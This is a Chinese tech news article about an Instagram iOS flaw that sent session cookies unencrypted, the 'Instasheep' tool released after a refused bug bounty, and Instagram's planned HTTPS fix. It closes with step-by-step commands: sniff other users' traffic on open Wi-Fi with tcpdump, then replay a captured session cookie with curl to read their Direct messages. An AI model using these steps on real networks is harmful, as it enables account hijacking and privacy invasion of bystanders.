- A+
前两天,国外媒体报道了最流行的图像和视频分享服务Instagram手机应用的重大安全问题,攻击者可以劫持用户帐户,可以获得私人照片,删除受害者的照片,编辑评论,或者发布新照片。
昨天,在伦敦开发者史蒂夫·格雷厄姆(Stevie Graham)发布了一款名为“Instasheep”的工具,这个名字来自2010年一款叫做“Firesheep”的Firefox拓展,它可以用来窃取Facebook等社交网站的账号信息,该插件能在用于对与攻击者同处一个网络下的会话劫持。
格雷厄姆几年前发现了Instagram的问题,他吃惊地发现Facebook也没有修复该问题。他声称Facebook拒绝为这个影响iOS应用的漏洞向他支付赏金,而后他发布了该工具。
格雷厄姆在其推特上说:“我被拒绝支付赏金。那么我的下一步是编写能够大规模劫持账号的自动化工具”他写道,“这是个相当严重的漏洞,请Facebook修复。”
有报道称社交网络巨头Facebook已知晓有关Instagram iOS应用的问题,并正在努力修复,Facebook打算使用HTTPS协议,但仍不清楚要花多久修复漏洞。
漏洞可能使iOS应用的用户受到中间人(MITM)攻击,因为Instagram会发送一些含有会话cookie的未加密数据。然后,攻击者可以在其他系统上/浏览器上利用这些截获的HTTP会话cookie劫持受害者的Instagram帐户。
“我不认为这个漏洞的使用障碍很高。只需要足够水平的技术人员就能够利用,漏洞利用相当简单,甚至是脚本小子也可以使用。此刻潘多拉的盒子已经被炸得四分五裂!”格雷厄姆在YCombinator写道。
Instagram联合创始人Mike Krieger(迈克·克里格)已经通过相同的YCombinator网站回应了这个问题,并表示,“我们一直在稳步增加对于HTTPS协议的支持,例如我们在2013年底推出的Instagram Direct,全部使用HTTPS进行会话。对于应用程序,尤其是对于延迟敏感的main feed功能和其它重要的浏览体验,我们正在积极努力推出了HTTPS,同时要确保不会损失性能,稳定性和用户体验。这是我们希望能够尽快完成的一个项目,我们将在开发博客上分享我们的经验,以便让其他公司借鉴一下。”
附Mac OS X下的工具使用步骤:
接入一个开放的或者WEP加密的Wifi
sudo tcpdump -In -i en0 -s 2048 -A dst i.instagram.com
等待同一网络的用户使用Instagram iOS应用
从输出的结果中提取cookie request header,利用cookie参数调用API,使用哪怕是https的功能,例子中使用的是Direct Message功能。
curl -H 'User-Agent: Instagram 6.0.4 (iPhone6,2; iPhone OS 7_1_1; en_GB; en-GB) AppleWebKit/420+' \ -H 'Cookie: sessionid=REDACTED' \ https://i.instagram.com/api/v1/direct_share/inbox/`
[Via THN & stevegraham github,JohnChu 翻译整理]
- 我的微信
- 这是我的微信扫一扫
- 我的微信公众号
- 我的微信公众号扫一扫